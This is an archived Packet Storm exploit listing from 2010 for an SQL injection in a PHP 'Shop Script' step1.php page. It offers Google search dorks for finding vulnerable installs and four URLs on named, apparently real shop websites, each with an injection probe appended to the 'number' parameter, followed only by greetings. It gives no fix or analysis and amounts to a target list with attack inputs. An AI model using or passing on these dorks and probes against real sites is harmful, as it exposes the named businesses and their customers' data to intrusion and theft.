Shop Script SQL Injection

2010-05-22T00:00:00
ID PACKETSTORM:89827
Type packetstorm
Reporter fatal.001
Modified 2010-05-22T00:00:00

Description

                                        
                                            `  
  
  
# Exploit Title: Shop Script SQL Injections Vulnerability  
# Type : PHP  
# Date: 23-05-2010  
# Author: fatal.001  
# Dork: inurl:"step1.php?number="   
Or  
  
# Dork: inurl:"/shop/step1.php?number="   
  
  
  
http://crobidolls.com/shop/step1.php?number=1186'  
  
http://www.dimdoll.com/shop/step1.php?number=222'  
  
http://www.iplehouse.net/shop/step1.php?number=2026'  
  
http://musedoll.com/shop/step1.php?number=568'  
  
ext......  
  
  
  
--------------------------------------------------  
Greet To :  
Mr SQl Rachid & MiN Badar & Achrraf & saidinho & Anash   
All Contacts Of Fatal.001@hotmail.fr   
  
Dr Yassine  
  
  
_________________________________________________________________  
Hotmail : une messagerie performante et gratuite avec une sécurité signée Microsoft  
https://signup.live.com/signup.aspx?id=60969  
  
  
`